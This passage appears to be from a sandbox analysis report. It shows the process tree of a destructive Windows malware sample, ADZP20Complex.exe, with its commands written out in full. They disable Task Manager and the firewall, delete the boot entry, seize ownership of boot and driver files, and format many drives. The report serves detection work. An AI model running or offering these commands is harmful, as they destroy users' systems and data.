        7⤵
        
        PID:9608
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:9672
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9756
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:9864
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:9976
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:10068
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:10152
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:6312
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:10004
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:3428
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:10268
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:10320
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:10396
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:10452
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:10532
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:10564
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10624
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11236
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:13248
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:9832
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:7244
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3724
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3740
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3760
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3776
    - - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3784
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F180.tmp\F181.tmp\F182.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
        6⤵
        
        PID:4260
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:3096
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:6232
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:5084
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:4136
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:4484
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:4332
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:5016
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4420
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5036
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:5244
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:5296
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:5684
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:5788
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6652
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6644
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:7096
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:5932
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8852
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9732
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9840
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9960
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:10032
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10060
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:10144
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10220
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6404
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6052
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:10260
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:10300
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:10388
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:10444
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:10516
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:10556
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:10608
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:10660
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:10696
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:10712
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:10728
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:10876
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:10940
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:10988
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:11040
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11100
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12012
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12936
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12556
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:6400
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3804
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3820
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3828
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3844
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3860
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:2668
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:4224
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:4304
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        5⤵
        
        PID:4356
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4672
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:5060
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:4916
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:4912
    - - C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        5⤵
        
        PID:4808
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        5⤵
        
        PID:3164
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\drivers" /reset /t /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:5060
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
        5⤵
        Views/modifies file attributes
        
        PID:4332
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5596
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5620
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5644
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5676
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5760
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5820
    - - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        5⤵
        
        PID:5836
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9F99.tmp\9F9A.tmp\9F9B.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
        6⤵
        
        PID:10868
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:11572
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Modifies file permissions
        
        PID:11684
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:5720
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:9988
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:12972
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:7396
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:2208
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:8008
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:10280
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:12804
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:7448
        
        C:\Windows\SysWOW64\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:7516
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5852
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5880
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5892
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:5908
    - - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        5⤵
        
        PID:5924
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AD01.tmp\AD02.tmp\AD03.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
        6⤵
        
        PID:10816
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:10900
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:11516
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:10136
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:12344
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:7048
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:13012
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:12328
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        
        PID:9668
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:8008
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:3480
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:12668
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5940
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5964
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5984
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:6008
    - - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        5⤵
        
        PID:6032
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\B212.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
        6⤵
        
        PID:11144
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:12072
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:2748
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:12328
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:12628
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:11268
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:12564
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:8836
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:12416
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:12668
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:3648
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6052
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6084
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:6112
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:6120
    - - C:\Windows\system32\format.com
        
        format /y /q A:
        5⤵
        
        PID:5172
    - - C:\Windows\system32\format.com
        
        format /y /q B:
        5⤵
        
        PID:5240
    - - C:\Windows\system32\format.com
        
        format /y /q D:
        5⤵
        
        PID:6524
    - - C:\Windows\system32\format.com
        
        format /y /q E:
        5⤵
        
        PID:6728
    - - C:\Windows\system32\format.com
        
        format /y /q F:
        5⤵
        
        PID:7000
    - - C:\Windows\system32\format.com
        
        format /y /q G:
        5⤵
        
        PID:6188
    - - C:\Windows\system32\format.com
        
        format /y /q H:
        5⤵
        
        PID:4768
    - - C:\Windows\system32\format.com
        
        format /y /q I:
        5⤵
        
        PID:6312
    - - C:\Windows\system32\format.com
        
        format /y /q J:
        5⤵
        
        PID:9284
    - - C:\Windows\system32\format.com
        
        format /y /q K:
        5⤵
        
        PID:11112
    - - C:\Windows\system32\format.com
        
        format /y /q L:
        5⤵
        
        PID:11508
    - - C:\Windows\system32\format.com
        
        format /y /q M:
        5⤵
        
        PID:572
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\vbisurf.ax"
        5⤵
        
        PID:6468
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:2484
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:1976
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:1856
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:2056
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2768
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1688
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2568
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1648
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1916
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1920
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {current}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:3000
- - C:\Windows\system32\msg.exe
    msg * Virus detectado
    3⤵
    PID:904
- - C:\Windows\system32\msg.exe
    msg * Virus detectado
    3⤵
    PID:1748
- - C:\Windows\system32\msg.exe
    msg * Has sido hackeado!
    3⤵
    PID:304
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\drivers" /r
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1608
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\drivers" /reset /t /c /q
    3⤵
    PID:4260
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
    3⤵
    - Drops file in Drivers directory
    PID:4280
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4364
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4372
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4380
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4388
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4396
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4404
- - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
    C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:4412
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\741.tmp\742.tmp\743.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
      4⤵
      PID:6104
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:6020
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        
        PID:12224
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        Modifies file permissions
        
        PID:5720
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5568
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        Views/modifies file attributes
        
        PID:6168
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6380
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        
        PID:6564
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:6600
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        
        PID:6688
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        
        PID:6772
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        
        PID:6828
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:6948
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:6972
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:5560
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:11580
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        
        PID:9376
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Views/modifies file attributes
        
        PID:12804
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5832
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:7556
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:12712
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:12936
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:8336
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6464
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4424
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:4440
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:4448
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:4456
- - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
    C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:4468
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\81C.tmp\82C.tmp\82D.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
      4⤵
      PID:4908
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:5552
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Possible privilege escalation attempt
        
        PID:11956
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5156
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        Modifies file permissions
        
        PID:4768
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        
        PID:6188
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        
        PID:6448
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6588
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:6620
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Possible privilege escalation attempt
        
        PID:6712
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        Modifies file permissions
        
        PID:6800
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        Views/modifies file attributes
        
        PID:6876
